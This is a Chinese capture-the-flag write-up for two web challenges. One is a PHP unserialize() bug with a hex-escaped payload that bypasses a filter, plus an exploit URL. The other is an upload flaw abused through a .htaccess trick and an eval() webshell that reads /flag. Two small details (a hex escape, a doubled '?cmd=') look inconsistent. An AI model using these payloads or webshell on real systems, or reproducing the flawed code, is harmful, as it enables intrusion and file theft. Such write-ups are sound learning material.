Web#

power_cut#

  1. .index.php.swp
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    <?php
    class logger{
        public $logFile;
        public $initMsg;
        public $exitMsg;
      
        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile =  $file;
            readfile($this->logFile);
            
        }
      
        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }
      
        function __destruct(){
            echo "this is destruct";
        }
    }

    class weblog {
        public $weblogfile;

        function __construct() {
        	$flag="system('cat /flag')";
        	echo "$flag";
        }

        function __wakeup(){
            // self::waf($this->filepath);
            $obj = new logger($this->weblogfile);
        }

        public function waf($str){
            $str=preg_replace("/[<>*#'|?\n ]/","",$str);
            $str=str_replace('flag','',$str);
            return $str;
        }

        function __destruct(){
            echo "this is destruct";
        }

    }


    $log = $_GET['log'];
    $log = preg_replace("/[<>*#'|?\n ]/","",$log);
    $log = str_replace('flag','',$log);
    $log_unser = unserialize($log);

    ?>

    <html>
    <body>
    <p><br/>昨天晚上因为14级大风停电了.</p>
    </body>
    </html>

  2. 构造反序列化payload(S \hex)
    1
    2
    3
    4
    5
    $log = new weblog();
    $log->weblogfile = '/flag';
    echo serialize($log);
    $s = 'O:6:"weblog":1:{s:10:"weblogfile";S:5:"/\73lag";}';
    echo urlencode($s);
  3. get flag
    1
    http://119.3.128.126:32800/?log=O%3A6%3A%22weblog%22%3A1%3A%7Bs%3A10%3A%22weblogfile%22%3BS%3A5%3A%22%2F%5C66lag%22%3B%7D

UploadHub#

  1. index.php 后缀名过滤 in_array 代码错误,上传任意后缀文件
  2. 上传 .htaccess 重新打开 php engine
    1
    2
    3
    4
    <FilesMatch "index"> 
    php_flag engine on
    </FilesMatch>
    php_value auto_prepend_file ".htaccess"
  3. 上传 php webshell index.php
    1
    <?php eval($_REQUEST[cmd]); ?>
  4. index.php?cmd=?cmd=echo%20file_get_contents(%27/flag%27);